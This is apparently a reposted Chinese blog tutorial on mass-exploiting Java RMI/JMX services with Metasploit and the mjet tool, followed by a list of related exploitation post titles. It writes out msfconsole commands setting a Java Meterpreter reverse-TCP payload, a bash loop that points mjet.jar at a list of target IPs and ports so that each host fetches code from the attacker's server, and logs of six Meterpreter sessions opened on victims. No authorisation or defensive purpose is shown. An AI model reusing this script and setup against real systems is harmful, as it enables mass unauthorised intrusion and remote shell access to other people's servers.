利用MSF批量打RMI漏洞
声明:不会Java。
参考:https://www.secpulse.com/archives/6203.html
下载mjet,https://github.com/mogwaisec/mjet
按照说明中的步骤:
- Copy the "MBean" folder to "data/java/metasploit"
- Copy java_mlet_server.rb to "modules/exploits/multi/misc/"
这里有个坑,metasploit默认目录里没有data/java/这个目录,需要手动创建一下,而且里面缺少Payload.class这个类,find命令找一下,因为每个人的这个class位置都可能不一样。然后把它拷进/data/java/metasploit/下
启动msf监听,选择刚才导入的那个模块
1 msf > use exploit/multi/misc/java_mlet_server 2 msf exploit(multi/misc/java_mlet_server) > set payload java/meterpreter/reverse_tcp 3 payload => java/meterpreter/reverse_tcp 4 msf exploit(multi/misc/java_mlet_server) > set LHOST 1.1.1.1 5 LHOST => 1.1.1.1 6 msf exploit(multi/misc/java_mlet_server) > set LPORT 4444 7 LPORT => 4444 8 msf exploit(multi/misc/java_mlet_server) > set URIPATH /bobac/ 9 URIPATH => /bobac/ 10 msf exploit(multi/misc/java_mlet_server) > run 11 [*] Started reverse TCP handler on 1.1.1.1:4444 12 [*] Using URL: http://0.0.0.0:8080/bobac/ 13 [*] Local IP: http://1.1.1.1:8080/bobac/ 14 [*] Server started.
然后用下载的mjet.jar让远程主机主动连接我的服务器,批量利用可以写一个shell脚本。
1 #!/bin/bash 2 function getip(){ 3 while read i 4 do 5 timeout 2s java -jar mjet.jar -u http://1.1.1.1:8080/bobac/ -t `echo $i|awk '{print $1}'` -p `echo $i|awk '{print $2}'` 6 done < rmi-ip.txt 7 } 8 getip
rmi-ip.txt是存放的ip与端口文件,直接执行。msf监听到并且直接获取会话session。
1 msf exploit(multi/misc/java_mlet_server) > 2 [*] x.x.x.x java_mlet_server - handling request for /bobac/ 3 [*] Sending stage (53859 bytes) to x.x.x.x 4 [*] Meterpreter session 3 opened (x.x.x.x:4444 -> x.x.x.x:33477) at 2018-02-24 17:38:05 +0800 5 [*] x.x.x.x java_mlet_server - handling request for /bobac/ 6 [*] Sending stage (53859 bytes) to x.x.x.x 7 [*] Meterpreter session 4 opened (x.x.x.x:4444 -> x.x.x.x:33486) at 2018-02-24 17:38:08 +0800 8 [*] x.x.x.x java_mlet_server - handling request for /bobac/ 9 [*] Sending stage (53859 bytes) to x.x.x.x 10 [*] Meterpreter session 5 opened (x.x.x.x:4444 -> x.x.x.x:19321) at 2018-02-24 17:38:22 +0800 11 [*] x.x.x.x java_mlet_server - handling request for /bobac/ 12 [*] x.x.x.x java_mlet_server - handling request for /bobac/ 13 [*] x.x.x.x java_mlet_server - handling request for /bobac/nhUsuayJ.jar 14 [*] Sending stage (53859 bytes) to x.x.x.x 15 [*] Meterpreter session 6 opened (x.x.x.x:4444 -> x.x.x.x:56411) at 2018-02-24 17:40:53 +0800
6个,sessions -i 找一个进去
--enjoy your shell :)
转载于:https://www.cnblogs.com/co10rway/p/8467312.html
利用MSF批量打RMI漏洞相关推荐
- kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...
- kail利用msf工具对MS12-020漏洞进行渗透测试
kail利用msf工具对MS12-020漏洞进行渗透测试 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞 kail利用msf工具对MS12-020漏洞进行渗透 ...
- kail利用msf工具对ms11-003漏洞入侵渗透Win7
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.2 ...
- kail利用msf工具对ms10-087漏洞入侵渗透WinXP
1.实验环境: Kali2020:10.20.29.129 Windows 2003:10.20.29.137 两台虚拟机能够相互ping通 2.实验步骤 1, 启动Metasploit 2,查找和M ...
- Kali利用msf对MS10_061漏洞进行渗透测试
注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 ...
- kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7
kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...
- kali 利用msf通过win7永恒之蓝漏洞获取权限
kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...
- Kali利用MSF入侵安卓手机
kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...
- 利用wxid批量加好友
在2023年2月12号微信更新后,许多做营销的都用相关导群软件都导不出微信号了,只能导出wxid,而wxid是搜索不到添加不了好友的,那么我们现在就可以利用wxid扫一扫协议利用wxid批量加好友, ...
最新文章
- 对当前JAVA流行框架的一些小感悟
- python编程语法-Python编程入门——基础语法详解
- 【C语言】13-指针和字符串
- GiliSoft Video Editor 13中文版
- wordpress插件制作
- 今天用Map集合写了一个字符串字符统计的程序,看集合看的头痛,就看了一下GUI,于是就随便记点。
- 怎么能把你的公司快速做大呢
- 扒一扒AI的那些事儿
- ubuntu 20.04gitlab-runner docker方式安装使用
- 浅析企业云服务之SaaS、PaaS、IaaS对比分析
- android百度地图路线查询,Android百度地图——路线规划搜索
- 诗词-已然绿盈盈蓝点缀
- web前端的css示例
- 关于列columns的一些配置
- Java-分布式锁的实现方式
- python出现invalid syntax什么意思_关于Python出现invalid syntax的几种原因
- 从零维到十维空间如何在纸上用手绘出来
- pip 安装 sklearn 教程 ----Win10 python3.5
- uboot-uboot升级调试uboot篇
- 把《算法的乐趣》随书源码放在GitHub上了
热门文章
- mysql启动提示 access denied for user root@localhost(using password:YES) 解决办法总结
- Android修图处理算法—— drawBitmapMesh算法实现瘦脸效果
- Android studio中提交svn一直卡在performing VCS commit
- 【clickhouse】clickhouse 表引擎 之 SummIngMergeTree
- 【java】ASM代理方式 Byte-Buddy代理方式 Javassist代理方式
- 【Elasticsearch】Elasticsearch 索引 模板 template
- 【Flink】Flink UI 查看 subtask在相应的机器上的调度时间
- Oracle match_recognize
- drools 7.x定时器
- gtp文件服务器,GTP中文网吉它谱吉他谱guitar网站